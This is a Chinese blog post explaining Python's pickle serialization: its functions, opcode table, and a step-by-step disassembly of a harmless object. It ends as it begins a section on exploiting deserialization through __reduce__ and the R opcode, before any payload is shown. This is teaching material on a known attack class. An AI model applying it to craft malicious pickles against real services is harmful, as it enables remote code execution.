<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="pickle反序列化, Lees&#39;s Blog">
    <meta name="description" content="基础知识pickle库及函数pickle是python语言的一个标准模块，实现了基本的数据序列化和反序列化。
常用的函数



函数
说明



dumps
对象反序列化为bytes对象


dump
对象反序列化到文件对象，存入文件


">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>pickle反序列化 | Lees&#39;s Blog</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 6.1.0"><link rel="alternate" href="/atom.xml" title="Lees's Blog" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Lees&#39;s Blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fa fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fa fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fa fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fa fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fa fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fa fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Lees&#39;s Blog</div>
        <div class="logo-desc">
            
            没有目的，就做不成任何事情
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fa fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fa fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fa fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fa fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fa fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fa fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/21.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">pickle反序列化</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">
                                <span class="chip bg-color">反序列化</span>
                            </a>
                        
                            <a href="/tags/python/">
                                <span class="chip bg-color">python</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" class="post-category">
                                反序列化
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2021-10-15
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    3.2k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    14 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h2 id="基础知识"><a href="#基础知识" class="headerlink" title="基础知识"></a>基础知识</h2><h3 id="pickle库及函数"><a href="#pickle库及函数" class="headerlink" title="pickle库及函数"></a>pickle库及函数</h3><p>pickle是python语言的一个标准模块，实现了基本的数据序列化和反序列化。</p>
<p>常用的函数</p>
<table>
<thead>
<tr>
<th>函数</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>dumps</td>
<td>对象反序列化为bytes对象</td>
</tr>
<tr>
<td>dump</td>
<td>对象反序列化到文件对象，存入文件</td>
</tr>
<tr>
<td>loads</td>
<td>从bytes对象反序列化</td>
</tr>
<tr>
<td>load</td>
<td>对象反序列化，从文件中读取数据</td>
</tr>
</tbody></table>
<p>我们举例来看看</p>
<p>序列化</p>
<span id="more"></span>

<pre class=" language-python"><code class="language-python">pickle<span class="token punctuation">.</span>dump<span class="token punctuation">(</span><span class="token punctuation">)</span>方法将obj对象序列化为字节（bytes）写入到file文件中
pickle<span class="token punctuation">.</span>dump<span class="token punctuation">(</span>obj<span class="token punctuation">,</span> file<span class="token punctuation">,</span> protocol<span class="token operator">=</span>None<span class="token punctuation">,</span> <span class="token operator">*</span><span class="token punctuation">,</span> fix_imports<span class="token operator">=</span><span class="token boolean">True</span><span class="token punctuation">)</span>

pickle<span class="token punctuation">.</span>dumps<span class="token punctuation">(</span><span class="token punctuation">)</span>方法将obj对象序列化并返回一个bytes对象
pickle<span class="token punctuation">.</span>dumps<span class="token punctuation">(</span>obj<span class="token punctuation">,</span> protocol<span class="token operator">=</span>None<span class="token punctuation">,</span> <span class="token operator">*</span><span class="token punctuation">,</span> fix_imports<span class="token operator">=</span><span class="token boolean">True</span><span class="token punctuation">)</span>

pickle构造出的字符串，有很多个版本。在pickle<span class="token punctuation">.</span>dumps时，可以用Protocol参数指定协议版本，版本向前兼容
</code></pre>
<p>反序列化</p>
<pre class=" language-python"><code class="language-python">pickle<span class="token punctuation">.</span>load<span class="token punctuation">(</span><span class="token punctuation">)</span>方法从file对象文件中读取序列化数据，将其反序列化之后返回一个对象
pickle<span class="token punctuation">.</span>load<span class="token punctuation">(</span>file<span class="token punctuation">,</span> <span class="token operator">*</span><span class="token punctuation">,</span> fix_imports<span class="token operator">=</span><span class="token boolean">True</span><span class="token punctuation">,</span> encoding<span class="token operator">=</span><span class="token string">"ASCII"</span><span class="token punctuation">,</span> errors<span class="token operator">=</span><span class="token string">"strict"</span><span class="token punctuation">)</span>

pickle<span class="token punctuation">.</span>loads<span class="token punctuation">(</span><span class="token punctuation">)</span>方法将bytes_object反序列化并返回一个对象
pickle<span class="token punctuation">.</span>loads<span class="token punctuation">(</span>bytes_object<span class="token punctuation">,</span> <span class="token operator">*</span><span class="token punctuation">,</span> fix_imports<span class="token operator">=</span><span class="token boolean">True</span><span class="token punctuation">,</span> encoding<span class="token operator">=</span><span class="token string">"ASCII"</span><span class="token punctuation">,</span> errors<span class="token operator">=</span><span class="token string">"strict"</span><span class="token punctuation">)</span>
</code></pre>
<p>需要注意的一点：注意：对于我们自己定义的class，如果直接以 data&#x3D;’aaa’ 的方式赋初值，则这个date不会被打包，解决方案是写一个__init__()方法</p>
<pre class=" language-python"><code class="language-python"><span class="token keyword">import</span> pickle

<span class="token keyword">class</span> <span class="token class-name">Test1</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    data <span class="token operator">=</span> <span class="token string">'aaa'</span>
    
<span class="token keyword">class</span> <span class="token class-name">Test2</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">def</span> <span class="token function">__init__</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>
        self<span class="token punctuation">.</span>data <span class="token operator">=</span> <span class="token string">'aaa'</span>

test1 <span class="token operator">=</span> Test1<span class="token punctuation">(</span><span class="token punctuation">)</span>
test2 <span class="token operator">=</span> Test2<span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>pickle<span class="token punctuation">.</span>dumps<span class="token punctuation">(</span>test1<span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>pickle<span class="token punctuation">.</span>dumps<span class="token punctuation">(</span>test2<span class="token punctuation">)</span><span class="token punctuation">)</span>
</code></pre>
<h3 id="Unpickler"><a href="#Unpickler" class="headerlink" title="_Unpickler"></a>_Unpickler</h3><p>pickle.load()和pickle.loads()方法的底层实现是基于 _Unpickler()方法来反序列化。</p>
<p>在反序列化过程中，<code>_Unpickler</code>（以下称为机器吧）维护了两个东西：栈区和存储区。结构如下（本图片仅为示意图）：</p>
<p><img src="https://bu.dusays.com/2021/10/30/251926d16a4f1.png"></p>
<p>为了研究它，也为了看懂那些乱七八糟的字符串，我们需要一个有力的调试器。这就是<code>pickletools</code>。</p>
<h3 id="pickletools"><a href="#pickletools" class="headerlink" title="pickletools"></a>pickletools</h3><p>pickletools是python自带的pickle调试器，有三个功能：<strong>反汇编</strong>一个已经被打包的字符串、<strong>优化</strong>一个已经被打包的字符串、返回一个迭代器来供程序使用。</p>
<p><img src="https://bu.dusays.com/2021/10/30/188615904cc96.png"></p>
<h3 id="PVM-python虚拟机"><a href="#PVM-python虚拟机" class="headerlink" title="PVM(python虚拟机)"></a>PVM(python虚拟机)</h3><p>当运行python程序的时候，python解释器会将源代码编译成字节码，然后交给 PVM 循环迭代字节码指令</p>
<p>字节码，如果python有写入的权限，那么会生成一个 .pyc 的字节码文件，若没有那就再内存中生成字节码，程序结束后丢弃。</p>
<p>在上图中字符串 s 是一串指令，学名叫PVM指令。</p>
<p>PVM指令集，用的时候可以查，在pickle库里</p>
<pre class=" language-python"><code class="language-python"><span class="token comment" spellcheck="true"># Pickle opcodes.  See pickletools.py for extensive docs.  The listing</span>
<span class="token comment" spellcheck="true"># here is in kind-of alphabetical order of 1-character pickle code.</span>
<span class="token comment" spellcheck="true"># pickletools groups them by purpose.</span>

MARK           <span class="token operator">=</span> b<span class="token string">'('</span>   <span class="token comment" spellcheck="true"># push special markobject on stack</span>
STOP           <span class="token operator">=</span> b<span class="token string">'.'</span>   <span class="token comment" spellcheck="true"># every pickle ends with STOP</span>
POP            <span class="token operator">=</span> b<span class="token string">'0'</span>   <span class="token comment" spellcheck="true"># discard topmost stack item</span>
POP_MARK       <span class="token operator">=</span> b<span class="token string">'1'</span>   <span class="token comment" spellcheck="true"># discard stack top through topmost markobject</span>
DUP            <span class="token operator">=</span> b<span class="token string">'2'</span>   <span class="token comment" spellcheck="true"># duplicate top stack item</span>
FLOAT          <span class="token operator">=</span> b<span class="token string">'F'</span>   <span class="token comment" spellcheck="true"># push float object; decimal string argument</span>
INT            <span class="token operator">=</span> b<span class="token string">'I'</span>   <span class="token comment" spellcheck="true"># push integer or bool; decimal string argument</span>
BININT         <span class="token operator">=</span> b<span class="token string">'J'</span>   <span class="token comment" spellcheck="true"># push four-byte signed int</span>
BININT1        <span class="token operator">=</span> b<span class="token string">'K'</span>   <span class="token comment" spellcheck="true"># push 1-byte unsigned int</span>
LONG           <span class="token operator">=</span> b<span class="token string">'L'</span>   <span class="token comment" spellcheck="true"># push long; decimal string argument</span>
BININT2        <span class="token operator">=</span> b<span class="token string">'M'</span>   <span class="token comment" spellcheck="true"># push 2-byte unsigned int</span>
NONE           <span class="token operator">=</span> b<span class="token string">'N'</span>   <span class="token comment" spellcheck="true"># push None</span>
PERSID         <span class="token operator">=</span> b<span class="token string">'P'</span>   <span class="token comment" spellcheck="true"># push persistent object; id is taken from string arg</span>
BINPERSID      <span class="token operator">=</span> b<span class="token string">'Q'</span>   <span class="token comment" spellcheck="true">#  "       "         "  ;  "  "   "     "  stack</span>
REDUCE         <span class="token operator">=</span> b<span class="token string">'R'</span>   <span class="token comment" spellcheck="true"># apply callable to argtuple, both on stack</span>
STRING         <span class="token operator">=</span> b<span class="token string">'S'</span>   <span class="token comment" spellcheck="true"># push string; NL-terminated string argument</span>
BINSTRING      <span class="token operator">=</span> b<span class="token string">'T'</span>   <span class="token comment" spellcheck="true"># push string; counted binary string argument</span>
SHORT_BINSTRING<span class="token operator">=</span> b<span class="token string">'U'</span>   <span class="token comment" spellcheck="true">#  "     "   ;    "      "       "      " &lt; 256 bytes</span>
UNICODE        <span class="token operator">=</span> b<span class="token string">'V'</span>   <span class="token comment" spellcheck="true"># push Unicode string; raw-unicode-escaped'd argument</span>
BINUNICODE     <span class="token operator">=</span> b<span class="token string">'X'</span>   <span class="token comment" spellcheck="true">#   "     "       "  ; counted UTF-8 string argument</span>
APPEND         <span class="token operator">=</span> b<span class="token string">'a'</span>   <span class="token comment" spellcheck="true"># append stack top to list below it</span>
BUILD          <span class="token operator">=</span> b<span class="token string">'b'</span>   <span class="token comment" spellcheck="true"># call __setstate__ or __dict__.update()</span>
GLOBAL         <span class="token operator">=</span> b<span class="token string">'c'</span>   <span class="token comment" spellcheck="true"># push self.find_class(modname, name); 2 string args</span>
DICT           <span class="token operator">=</span> b<span class="token string">'d'</span>   <span class="token comment" spellcheck="true"># build a dict from stack items</span>
EMPTY_DICT     <span class="token operator">=</span> b<span class="token string">'&amp;#125;'</span>   # push empty dict
APPENDS        <span class="token operator">=</span> b<span class="token string">'e'</span>   <span class="token comment" spellcheck="true"># extend list on stack by topmost stack slice</span>
GET            <span class="token operator">=</span> b<span class="token string">'g'</span>   <span class="token comment" spellcheck="true"># push item from memo on stack; index is string arg</span>
BINGET         <span class="token operator">=</span> b<span class="token string">'h'</span>   <span class="token comment" spellcheck="true">#   "    "    "    "   "   "  ;   "    " 1-byte arg</span>
INST           <span class="token operator">=</span> b<span class="token string">'i'</span>   <span class="token comment" spellcheck="true"># build &amp; push class instance</span>
LONG_BINGET    <span class="token operator">=</span> b<span class="token string">'j'</span>   <span class="token comment" spellcheck="true"># push item from memo on stack; index is 4-byte arg</span>
LIST           <span class="token operator">=</span> b<span class="token string">'l'</span>   <span class="token comment" spellcheck="true"># build list from topmost stack items</span>
EMPTY_LIST     <span class="token operator">=</span> b<span class="token string">']'</span>   <span class="token comment" spellcheck="true"># push empty list</span>
OBJ            <span class="token operator">=</span> b<span class="token string">'o'</span>   <span class="token comment" spellcheck="true"># build &amp; push class instance</span>
PUT            <span class="token operator">=</span> b<span class="token string">'p'</span>   <span class="token comment" spellcheck="true"># store stack top in memo; index is string arg</span>
BINPUT         <span class="token operator">=</span> b<span class="token string">'q'</span>   <span class="token comment" spellcheck="true">#   "     "    "   "   " ;   "    " 1-byte arg</span>
LONG_BINPUT    <span class="token operator">=</span> b<span class="token string">'r'</span>   <span class="token comment" spellcheck="true">#   "     "    "   "   " ;   "    " 4-byte arg</span>
SETITEM        <span class="token operator">=</span> b<span class="token string">'s'</span>   <span class="token comment" spellcheck="true"># add key+value pair to dict</span>
TUPLE          <span class="token operator">=</span> b<span class="token string">'t'</span>   <span class="token comment" spellcheck="true"># build tuple from topmost stack items</span>
EMPTY_TUPLE    <span class="token operator">=</span> b<span class="token string">')'</span>   <span class="token comment" spellcheck="true"># push empty tuple</span>
SETITEMS       <span class="token operator">=</span> b<span class="token string">'u'</span>   <span class="token comment" spellcheck="true"># modify dict by adding topmost key+value pairs</span>
BINFLOAT       <span class="token operator">=</span> b<span class="token string">'G'</span>   <span class="token comment" spellcheck="true"># push float; arg is 8-byte float encoding</span>

TRUE           <span class="token operator">=</span> b<span class="token string">'I01\n'</span>  <span class="token comment" spellcheck="true"># not an opcode; see INT docs in pickletools.py</span>
FALSE          <span class="token operator">=</span> b<span class="token string">'I00\n'</span>  <span class="token comment" spellcheck="true"># not an opcode; see INT docs in pickletools.py</span>

<span class="token comment" spellcheck="true"># Protocol 2</span>

PROTO          <span class="token operator">=</span> b<span class="token string">'\x80'</span>  <span class="token comment" spellcheck="true"># identify pickle protocol</span>
NEWOBJ         <span class="token operator">=</span> b<span class="token string">'\x81'</span>  <span class="token comment" spellcheck="true"># build object by applying cls.__new__ to argtuple</span>
EXT1           <span class="token operator">=</span> b<span class="token string">'\x82'</span>  <span class="token comment" spellcheck="true"># push object from extension registry; 1-byte index</span>
EXT2           <span class="token operator">=</span> b<span class="token string">'\x83'</span>  <span class="token comment" spellcheck="true"># ditto, but 2-byte index</span>
EXT4           <span class="token operator">=</span> b<span class="token string">'\x84'</span>  <span class="token comment" spellcheck="true"># ditto, but 4-byte index</span>
TUPLE1         <span class="token operator">=</span> b<span class="token string">'\x85'</span>  <span class="token comment" spellcheck="true"># build 1-tuple from stack top</span>
TUPLE2         <span class="token operator">=</span> b<span class="token string">'\x86'</span>  <span class="token comment" spellcheck="true"># build 2-tuple from two topmost stack items</span>
TUPLE3         <span class="token operator">=</span> b<span class="token string">'\x87'</span>  <span class="token comment" spellcheck="true"># build 3-tuple from three topmost stack items</span>
NEWTRUE        <span class="token operator">=</span> b<span class="token string">'\x88'</span>  <span class="token comment" spellcheck="true"># push True</span>
NEWFALSE       <span class="token operator">=</span> b<span class="token string">'\x89'</span>  <span class="token comment" spellcheck="true"># push False</span>
LONG1          <span class="token operator">=</span> b<span class="token string">'\x8a'</span>  <span class="token comment" spellcheck="true"># push long from &lt; 256 bytes</span>
LONG4          <span class="token operator">=</span> b<span class="token string">'\x8b'</span>  <span class="token comment" spellcheck="true"># push really big long</span>

_tuplesize2code <span class="token operator">=</span> <span class="token punctuation">[</span>EMPTY_TUPLE<span class="token punctuation">,</span> TUPLE1<span class="token punctuation">,</span> TUPLE2<span class="token punctuation">,</span> TUPLE3<span class="token punctuation">]</span>

<span class="token comment" spellcheck="true"># Protocol 3 (Python 3.x)</span>

BINBYTES       <span class="token operator">=</span> b<span class="token string">'B'</span>   <span class="token comment" spellcheck="true"># push bytes; counted binary string argument</span>
SHORT_BINBYTES <span class="token operator">=</span> b<span class="token string">'C'</span>   <span class="token comment" spellcheck="true">#  "     "   ;    "      "       "      " &lt; 256 bytes</span>

<span class="token comment" spellcheck="true"># Protocol 4</span>

SHORT_BINUNICODE <span class="token operator">=</span> b<span class="token string">'\x8c'</span>  <span class="token comment" spellcheck="true"># push short string; UTF-8 length &lt; 256 bytes</span>
BINUNICODE8      <span class="token operator">=</span> b<span class="token string">'\x8d'</span>  <span class="token comment" spellcheck="true"># push very long string</span>
BINBYTES8        <span class="token operator">=</span> b<span class="token string">'\x8e'</span>  <span class="token comment" spellcheck="true"># push very long bytes string</span>
EMPTY_SET        <span class="token operator">=</span> b<span class="token string">'\x8f'</span>  <span class="token comment" spellcheck="true"># push empty set on the stack</span>
ADDITEMS         <span class="token operator">=</span> b<span class="token string">'\x90'</span>  <span class="token comment" spellcheck="true"># modify set by adding topmost stack items</span>
FROZENSET        <span class="token operator">=</span> b<span class="token string">'\x91'</span>  <span class="token comment" spellcheck="true"># build frozenset from topmost stack items</span>
NEWOBJ_EX        <span class="token operator">=</span> b<span class="token string">'\x92'</span>  <span class="token comment" spellcheck="true"># like NEWOBJ but work with keyword only arguments</span>
STACK_GLOBAL     <span class="token operator">=</span> b<span class="token string">'\x93'</span>  <span class="token comment" spellcheck="true"># same as GLOBAL but using names on the stacks</span>
MEMOIZE          <span class="token operator">=</span> b<span class="token string">'\x94'</span>  <span class="token comment" spellcheck="true"># store top of the stack in memo</span>
FRAME            <span class="token operator">=</span> b<span class="token string">'\x95'</span>  <span class="token comment" spellcheck="true"># indicate the beginning of a new frame</span>

<span class="token comment" spellcheck="true"># Protocol 5</span>

BYTEARRAY8       <span class="token operator">=</span> b<span class="token string">'\x96'</span>  <span class="token comment" spellcheck="true"># push bytearray</span>
NEXT_BUFFER      <span class="token operator">=</span> b<span class="token string">'\x97'</span>  <span class="token comment" spellcheck="true"># push next out-of-band buffer</span>
READONLY_BUFFER  <span class="token operator">=</span> b<span class="token string">'\x98'</span>  <span class="token comment" spellcheck="true"># make top of stack readonly</span>
</code></pre>
<p>列出几个比较重要的操作码：</p>
<blockquote>
<pre class=" language-text"><code class="language-text">c : 读取本行的内容作为模块名module, 读取下一行的内容作为对象名object，然后将 module.object 作为可调用对象压入到栈中

( : 将一个标记对象压入到栈中 , 用于确定命令执行的位置，该标记常常搭配 t 指令一起使用 , 以便产生一个元组

S : 后面跟字符串 , PVM会读取引号中的内容 , 直到遇见换行符 , 然后将读取到的内容压入到栈中

t : 从栈中不断弹出数据 , 弹射顺序与压栈时相同 , 直到弹出左括号，此时弹出的内容形成了一个元组 , 然后 , 该元组会被压入栈中

R : 将之前压入栈中的元组和可调用对象全部弹出 , 然后将该元组作为可调用参数的对象并执行该对象 。最后将结果压入到栈中

. : 结束整个 Pickle 反序列化过程
</code></pre>
</blockquote>
<p><strong>注意：PVM 指令的书写规范</strong><br>(1)操作码是单字节的<br>(2)带参数的指令用换行符定界</p>
<h3 id="OPCode-操作码"><a href="#OPCode-操作码" class="headerlink" title="OPCode(操作码)"></a>OPCode(操作码)</h3><p>在py3和py2中得到的opcode不相同，但pickle向下前兼容，所以我们可以用v0版本。</p>
<h3 id="Python-参数前的（-）和（-）"><a href="#Python-参数前的（-）和（-）" class="headerlink" title="Python 参数前的（*）和（**）"></a><a target="_blank" rel="noopener" href="https://www.runoob.com/w3cnote/python-one-and-two-star.html">Python 参数前的（*）和（**）</a></h3><p>这两种用法其实都是用来将任意个数的参数导入到 Python 函数中。</p>
<p>一个(*)–将所有参数以元组的形式导入</p>
<p>两个(**)–将所有参数以字典的形式导入</p>
<p>两个方法也可以用在一个函数。</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/xueweisuoyong/p/11891310.html#">不定长传参</a></p>
<h2 id="反序列化过程分析"><a href="#反序列化过程分析" class="headerlink" title="反序列化过程分析"></a>反序列化过程分析</h2><pre class=" language-python"><code class="language-python"><span class="token keyword">import</span> pickle<span class="token punctuation">,</span>pickletools

<span class="token keyword">class</span> <span class="token class-name">Test1</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">def</span> <span class="token function">__init__</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>
        self<span class="token punctuation">.</span>data <span class="token operator">=</span> <span class="token string">'lees'</span>

test1 <span class="token operator">=</span> Test1<span class="token punctuation">(</span><span class="token punctuation">)</span>
s <span class="token operator">=</span> pickle<span class="token punctuation">.</span>dumps<span class="token punctuation">(</span>test1<span class="token punctuation">,</span>protocol<span class="token operator">=</span><span class="token number">3</span><span class="token punctuation">)</span>
s <span class="token operator">=</span> pickletools<span class="token punctuation">.</span>optimize<span class="token punctuation">(</span>s<span class="token punctuation">)</span>
<span class="token comment" spellcheck="true">#优化字符串，也就是去掉不必要的 PUT指令----PUT意思是把当前栈的栈顶复制一份，放进储存区</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>s<span class="token punctuation">)</span>
pickletools<span class="token punctuation">.</span>dis<span class="token punctuation">(</span>s<span class="token punctuation">)</span>
<span class="token comment" spellcheck="true">#反汇编</span>
</code></pre>
<pre class=" language-text"><code class="language-text">b'\x80\x03c__main__\nTest1\n)\x81&#125;X\x04\x00\x00\x00dataX\x04\x00\x00\x00leessb.'
</code></pre>
<p>\x80–接收pickle的版本，这里为\x03</p>
<p>c–读取一行作为模块名__main__，再读取一行作为类名Test1，再通过find_class()获取到Test1对象，并压入stack栈</p>
<pre class=" language-text"><code class="language-text">stack:[<class '__main__.Test1'>]
</code></pre>
<p>)–压入一个空元组到stack栈中</p>
<pre class=" language-text"><code class="language-text">stack:[<class '__main__.Test1'>,()]
</code></pre>
<p>\x81–从栈弹出两个数据，()赋值给args，&lt;class ‘__main__.Test1’&gt;赋值给cls，再通过<a target="_blank" rel="noopener" href="https://blog.csdn.net/claroja/article/details/107056407">__new__()</a>实例化对象，并压入stack栈中</p>
<pre class=" language-text"><code class="language-text">stack:[<class '__main__.Test1'>]
</code></pre>
<p>}–压入一个空字典到栈里</p>
<pre class=" language-text"><code class="language-text">stack:[<class '__main__.Test1'>,&#123;&#125;]
</code></pre>
<p>X–接收字符串的长度，这里为\x04\x00\x00\x00接收到data，\x04\x00\x00\x00接收到lees，都存入栈中</p>
<pre class=" language-text"><code class="language-text">stack:[<class '__main__.Test1'>,&#123;&#125;,data,lees]
</code></pre>
<p>s–弹出两个数据，存入那个空字典中，并压入栈</p>
<pre class=" language-text"><code class="language-text">stack:[<class '__main__.Test1'>,&#123;'data':'lees'&#125;]
</code></pre>
<p>b–弹出 {‘data’:’lees’} 给state，弹出 &lt;class ‘__main__.Test1’&gt; 给inst，如果inst中存在__setstate__方法，则直接用<a target="_blank" rel="noopener" href="https://blog.csdn.net/jiang_huixin/article/details/109674221">setstate</a>来处理state，setstate(state)，如果不存在，则直接将state存入inst.__dict__中。</p>
<pre class=" language-text"><code class="language-text">stack:[]
</code></pre>
<p>.–结束反序列化。</p>
<h2 id="反序列化漏洞利用"><a href="#反序列化漏洞利用" class="headerlink" title="反序列化漏洞利用"></a>反序列化漏洞利用</h2><p>从上面的例子可以看出反序列化的过程完全可控，因此我们可以构造pickle，我们可以根据实例来理解构造的payload。</p>
<h3 id="reduce"><a href="#reduce" class="headerlink" title="__reduce__()"></a>__reduce__()</h3><p>python序列化主要有三个过程：从对象中提取所有属性——》写入对象的所有模块名和类名——》写入对象所有属性的键值对。python反序列化漏洞的产生和php的魔术方法有异曲同工之处，在Python2中的 __reduce__() 方法，会在每次的反序列化开始或结束时调用。它的指令码是<code>R</code>。</p>
<pre class=" language-test"><code class="language-test">__reduce__()方法

在新式类中生效，不带参数，应返回字符串或一个元组。

